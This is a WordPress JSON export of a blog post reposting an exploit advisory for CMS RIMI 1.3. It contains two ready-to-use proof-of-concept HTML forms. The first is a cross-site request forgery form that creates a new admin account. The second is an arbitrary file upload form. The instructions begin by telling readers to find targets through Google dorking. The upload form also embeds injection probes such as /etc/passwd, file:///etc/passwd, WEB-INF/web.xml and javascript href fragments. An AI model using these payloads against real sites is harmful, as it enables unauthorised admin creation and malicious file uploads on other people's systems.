{"id":59146,"date":"2024-08-23T20:00:04","date_gmt":"2024-08-23T17:00:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180338\/cmsrimi13-xsrf.txt"},"modified":"2024-08-23T20:00:04","modified_gmt":"2024-08-23T17:00:04","slug":"cms-rimi-1-3-cross-site-request-forgery-file-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cms-rimi-1-3-cross-site-request-forgery-file-upload\/","title":{"rendered":"CMS RIMI 1.3 Cross Site Request Forgery \/ File Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : CMS RIMI v1.3 CSRF Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |<br \/>| # Vendor : https:\/\/github.com\/myroot593\/RIMICMS |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] The following html code create a new admin .<\/p>\n[+] Go to the line 9.<\/p>\n[+] Set the target site link Save changes and apply . <\/p>\n[+] save code as poc.html .<\/p>\n<p>&lt;!DOCTYPE html&gt;<br \/>&lt;html lang=&#8221;en&#8221;&gt;<br \/>&lt;head&gt;<br \/>&lt;meta charset=&#8221;UTF-8&#8243;&gt;<br \/>&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width, initial-scale=1.0&#8243;&gt;<br \/>&lt;title&gt;Profile User Form&lt;\/title&gt;<br \/>&lt;\/head&gt;<br \/>&lt;body&gt;<br \/>&lt;form action=&#8221;http:\/\/127.0.0.1\/RIMICMS-master\/admin\/tambah-user.php&#8221; method=&#8221;POST&#8221;&gt;<br \/>&lt;!&#8211; Text input for username &#8211;&gt;<br \/>&lt;label for=&#8221;username&#8221;&gt;Username:&lt;\/label&gt;<br \/>&lt;input type=&#8221;text&#8221; id=&#8221;username&#8221; name=&#8221;username&#8221; required&gt;<\/p>\n<p>&lt;!&#8211; Password input for password &#8211;&gt;<br \/>&lt;label for=&#8221;password&#8221;&gt;Password:&lt;\/label&gt;<br \/>&lt;input type=&#8221;password&#8221; id=&#8221;password&#8221; name=&#8221;password&#8221; required&gt;<\/p>\n<p>&lt;!&#8211; Password input for confirm password &#8211;&gt;<br \/>&lt;label for=&#8221;confirm_password&#8221;&gt;Confirm Password:&lt;\/label&gt;<br \/>&lt;input type=&#8221;password&#8221; id=&#8221;confirm_password&#8221; name=&#8221;confirm_password&#8221; required&gt;<\/p>\n<p>&lt;!&#8211; Text input for name &#8211;&gt;<br \/>&lt;label for=&#8221;nama&#8221;&gt;Nama:&lt;\/label&gt;<br \/>&lt;input type=&#8221;text&#8221; id=&#8221;nama&#8221; name=&#8221;nama&#8221; required&gt;<\/p>\n<p>&lt;!&#8211; Text input for email &#8211;&gt;<br \/>&lt;label for=&#8221;email&#8221;&gt;Email:&lt;\/label&gt;<br \/>&lt;input type=&#8221;email&#8221; id=&#8221;email&#8221; name=&#8221;email&#8221; required&gt;<\/p>\n<p>&lt;!&#8211; Hidden input for user ID &#8211;&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;id&#8221; value=&#8221;&#8221;&gt;<\/p>\n<p>&lt;!&#8211; Submit button &#8211;&gt;<br \/>&lt;button type=&#8221;submit&#8221;&gt;Submit&lt;\/button&gt;<br \/>&lt;\/form&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; [+] Part 2 arbitrary file upload file uplaod [+] &#8212;&#8212;&#8212;&#8212;-<\/p>\n[+] Go to the line 3.<\/p>\n[+] Set the target site link Save changes and apply .<\/p>\n[+] Your file : 127.0.0.1\/cmsrimi\/content <\/p>\n[+] save code as poc.html .<\/p>\n<p>&lt;p class=&#8221;sukses-form&#8221;&gt;&lt;\/p&gt;<br \/>&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;<br \/>&lt;form action=&#8221;http:\/\/127.0.0.1\/RIMICMS-master\/admin\/tambah-berita.php&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart\/form-data&#8221;&gt;<br \/>&lt;div class=&#8221;form-group &#8220;&gt;<br \/>&lt;label&gt;Judul :&lt;\/label&gt;<br \/>&lt;input type=&#8221;text&#8221; name=&#8221;judul_berita&#8221; class=&#8221;form-control&#8221; id=&#8221;judul_berita1&#8243; placeholder=&#8221;Masukan judul berita&#8221; value=&#8221;&#8221;&gt;<br \/>&lt;span&gt;&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;&lt;\/span&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group &#8220;&gt;<br \/>&lt;label&gt;Isi Berita :&lt;\/label&gt;<br \/>&lt;textarea class=&#8221;ckeditor&#8221; name=&#8221;isi_berita&#8221; id=&#8221;isi_berita&#8221;&gt;&lt;\/textarea&gt;<br \/>&lt;span&gt;&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;&lt;\/span&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label&gt;Kategori Berita :&lt;\/label&gt;<br \/>&lt;select class=&#8217;form-control&#8217; name=&#8217;kategori_berita&#8217; id=&#8217;kategori_berita&#8217; required=&#8221;&gt;&lt;option value=1&gt;1&lt;\/option&gt;&lt;option value=a60CyEG6&gt;a60CyEG6&lt;\/option&gt;&lt;option value=0+0+0+1&gt;0+0+0+1&lt;\/option&gt;&lt;option value=basGxKs3&gt;basGxKs3&lt;\/option&gt;&lt;option value=${9999829+9999678}&gt;${9999829+9999678}&lt;\/option&gt;&lt;option value=1&amp;n991278=v96422&gt;1&amp;n991278=v96422&lt;\/option&gt;&lt;option value=)&gt;)&lt;\/option&gt;&lt;option value=\/etc\/passwd&gt;\/etc\/passwd&lt;\/option&gt;&lt;option value=!(()&amp;&amp;!|*|*|&gt;!(()&amp;&amp;!|*|*|&lt;\/option&gt;&lt;option value=^(#$!@#$)(()))******&gt;^(#$!@#$)(()))******&lt;\/option&gt;&lt;option value=\\'&#8221;()&gt;\\'&#8221;()&lt;\/option&gt;&lt;option value=testasp.vulnweb.com&gt;testasp.vulnweb.com&lt;\/option&gt;&lt;option value=kategori-berita.php&gt;kategori-berita.php&lt;\/option&gt;&lt;option value=file:\/\/\/etc\/passwd&gt;file:\/\/\/etc\/passwd&lt;\/option&gt;&lt;option value=WEB-INF\/web.xml?&gt;WEB-INF\/web.xml?&lt;\/option&gt;&lt;option value=WEB-INFweb.xml?&gt;WEB-INFweb.xml?&lt;\/option&gt;&lt;option value=1\\'&#8221;&gt;1\\'&#8221;&lt;\/option&gt;&lt;option value=&gt;&lt;\/option&gt;&lt;option value=\/WEB-INF\/web.xml?&gt;\/WEB-INF\/web.xml?&lt;\/option&gt;&lt;option value=\/www.vulnweb.com&gt;\/www.vulnweb.com&lt;\/option&gt;&lt;option value=\\'&#8221;&gt;\\'&#8221;&lt;\/option&gt;&lt;option value=942313&gt;942313&lt;\/option&gt;&lt;option value=@@5nFvp&gt;@@5nFvp&lt;\/option&gt;&lt;option value=&lt;!&#8211;&gt;&lt;!&#8211;&lt;\/option&gt;&lt;option value=JyI=&gt;JyI=&lt;\/option&gt;&lt;option value=\/\/www.vulnweb.com&gt;\/\/www.vulnweb.com&lt;\/option&gt;&lt;option value=1_927257&gt;1_927257&lt;\/option&gt;&lt;option value=&lt;a HrEF=jaVaScRiP&gt;&lt;a HrEF=jaVaScRiP&lt;\/option&gt;&lt;option value=1acuON4DgYSPCb&gt;1acuON4DgYSPCb&lt;\/option&gt;&lt;option value=1_924662&gt;1_924662&lt;\/option&gt;&lt;option value=1 src=943436&gt;1 src=943436&lt;\/option&gt;&lt;option value=&lt;a HrEF=jaVaScRiP&gt;&lt;a HrEF=jaVaScRiP&lt;\/option&gt;&lt;option value=1_996088&gt;1_996088&lt;\/option&gt;&lt;option value=&lt;a HrEF=jaVaScRiP&gt;&lt;a HrEF=jaVaScRiP&lt;\/option&gt;&lt;option value=1_984620&gt;1_984620&lt;\/option&gt;&lt;option value=&lt;a HrEF=jaVaScRiP&gt;&lt;a HrEF=jaVaScRiP&lt;\/option&gt;&lt;\/select&gt; &lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label&gt;Status:&lt;\/label&gt;<br \/>&lt;select class=&#8221;form-control&#8221; name=&#8221;status_berita&#8221; id=&#8221;status_berita&#8221;&gt;<br \/>&lt;option value=&#8221;Diterbitkan&#8221;&gt;Diterbitkan&lt;\/option&gt;<br \/>&lt;option value=&#8221;Draft&#8221;&gt;Draft&lt;\/option&gt;<br \/>&lt;\/select&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label&gt;Gambar Berita&lt;\/label&gt;<br \/>&lt;input type=&#8221;hidden&#8221; name=&#8221;tanggal_berita&#8221; id=&#8221;tanggal_berita&#8221; value=&#8221;24-08-22&#8243;&gt;<br \/>&lt;input type=&#8221;file&#8221; class=&#8221;form-control-file&#8221; id=&#8221;gambar_berita&#8221; name=&#8221;gambar_berita&#8221;&gt;<br \/>&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;<br \/>&lt;\/div&gt;<br \/>&lt;button type=&#8221;submit&#8221; class=&#8221;btn btn-primary&#8221;&gt;Submit&lt;\/button&gt;<br \/>&lt;\/form&gt;<br \/>&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt; <br \/>&lt;p class=&#8221;error-form&#8221;&gt;&lt;\/p&gt;<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : CMS RIMI v1.3 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/github.com\/myroot593\/RIMICMS |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] The following html code create a new admin &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59146","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59146"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59146\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}